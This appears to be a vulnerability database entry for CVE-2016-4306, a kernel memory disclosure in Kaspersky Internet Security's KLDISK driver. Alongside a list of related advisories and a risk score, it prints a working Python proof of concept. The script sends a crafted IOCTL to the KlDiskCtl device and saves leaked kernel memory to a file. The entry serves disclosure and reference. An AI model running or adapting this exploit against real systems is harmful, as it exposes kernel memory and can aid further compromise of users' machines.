Kaspersky Internet Security KLDISK Driver Multiple Kernel Memory Disclosure Vulnerabilities(CVE-2016-4306)

🗓️ 13 Oct 2017 00:00:00Reported by RootType

Kaspersky Internet Security KLDISK Driver Memory Disclosure Vulnerabilitie

Reporter	Title	Published	Views	Family All 14
ATTACKERKB	CVE-2016-4306	6 Jan 201721:59	–	attackerkb
CNVD	Multiple Kaspersky Products Information Disclosure Vulnerabilities	27 Aug 201600:00	–	cnvd
CVE	CVE-2016-4306	6 Jan 201721:00	–	cve
Cvelist	CVE-2016-4306	6 Jan 201721:00	–	cvelist
EUVD	EUVD-2016-5306	7 Oct 202500:30	–	euvd
Kaspersky	KLA10945 Information leak and denial of service vulnerabilities in Kaspersky products	6 Jan 201700:00	–	kaspersky
NVD	CVE-2016-4306	6 Jan 201721:59	–	nvd
OpenVAS	Kaspersky Internet Security <= 16.0.0.614 KLDISK Driver Multiple Kernel Memory Disclosure Vulnerabilities - Windows	24 Nov 201600:00	–	openvas
OpenVAS	Kaspersky Anti-Virus < 17.0.0.611 Multiple Vulnerabilities	23 Jan 201700:00	–	openvas
OpenVAS	Kaspersky Total Security < 17.0.0.611 Multiple Vulnerabilities	23 Jan 201700:00	–	openvas


                                                  import win32file
  import win32con

  def leak_memory():
     fileName = u'\\\\.\\KlDiskCtl'
     hFile = win32file.CreateFileW(fileName,
                                  win32con.GENERIC_READ |win32con.GENERIC_WRITE,
                                  0,
                                  None,
                                  win32con.OPEN_EXISTING, 0 , None, 0)
     print "Handle ready : ",repr(hFile)

     ioctl = 0x8123e048
     inputBuffer = "A"*0x14
     inputBufferLen = len(inputBuffer)
     outBufferLen   = 0x1000

     print "Time to send IOCTL : 0x%x" % ioctl
     buf = win32file.DeviceIoControl(hFile, ioctl,inputBuffer,outBufferLen)
     buf = buf[inputBufferLen:]
     with file('outBuff.bin','wb') as f:
       f.write(buf)

  if __name__  == "__main__":
     leak_memory()

13 Oct 2017 00:00Current

5.9Medium risk

Vulners AI Score5.9

EPSS0.00097